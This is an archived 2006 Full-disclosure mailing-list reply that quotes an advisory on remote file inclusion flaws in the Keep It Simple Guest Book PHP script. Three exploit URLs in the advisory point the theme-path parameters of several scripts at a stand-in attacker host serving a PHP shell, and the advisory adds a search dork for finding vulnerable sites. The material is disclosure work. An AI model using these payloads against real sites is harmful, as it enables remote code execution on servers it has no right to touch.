Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB

from [3APA3A] Network Security [Permanent Link]
Subject: Re: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB
Date: Sat, 23 Dec 2006 00:00:06 +0300 
Dear 0o_zeus_o0 elitemexico.org,

 Thanks, published. http://www.security.nnov.ru/source13365.html

--Friday, December 22, 2006, 11:55:17 PM, you wrote to bugtraq@zone-h.org:

0eo> ###########################################################################
0eo> # Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
0eo> #
0eo> # Author: 0o_zeus_o0 ( Arturo Z. )
0eo> # Contact: zeus@diosdelared.com
0eo> # Website: www.diosdelared.com
0eo> # Date: 22/12/06
0eo> # Risk: critical
0eo> # Vendor Url: http://sourceforge.net/projects/kisgb,
0eo> http://ravenphpscripts.com
0eo> # Affected Software: Keep It Simple Guest Book
0eo> # search: inurl:kisgb , intitle:KISGB
0eo> #
0eo> #Info:
0eo> ##################################################################
0eo> #Bug is risky by since it is possible to be included I cosay malisioso
0eo> #that allows to see or to modify the archives
0eo> #code:
0eo> #if (isset($default_path_for_themes))
0eo> require("$default_path_for_themes/$theme");
0eo> #else require("$path_to_themes/$theme");
0eo> ##################################################################
0eo> #
0eo> #
0eo> #http://site/path/gbpath/authenticate.php?path_to_themes=
0eo> http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/admin.php?default_path_for_themes=
0eo> http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/upconfig.php?default_path_for_themes=
0eo> http://shellsite.com/php.gif?
0eo> ##################################################################
0eo> #VULNERABLE VERSIONS
0eo> ##################################################################
0eo> # 5.0.0
0eo> #
0eo> ##################################################################
0eo> #Contact information
0eo> #0o_zeus_o0
0eo> #zeus@diosdelared.com
0eo> #www.diosdelared.com
0eo> ##################################################################
0eo> #greetz: S.S.M, sams, a mi beba
0eo> #Original Advisory: http://diosdelared.com/15.txt
0eo> ##################################################################


-- 
~/ZARAZA
Ñòðåëÿÿ âî âòîðîé ðàç, îí èñêàëå÷èë ïîñòîðîííåãî. Ïîñòîðîííèì áûë ÿ. (Òâåí)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  SQID v0.2 - SQL Injection Digger., contact
Next by Date:  Re: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB, str0ke
Previous by Thread:  [Full-disclosure] Multiple Remote Vulnerabilities in KISGB, 0o_zeus_o0 elitemexico.org
Next by Thread:  Re: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB, str0ke
Indexes:  [Date] [Thread] [Top] [All Lists]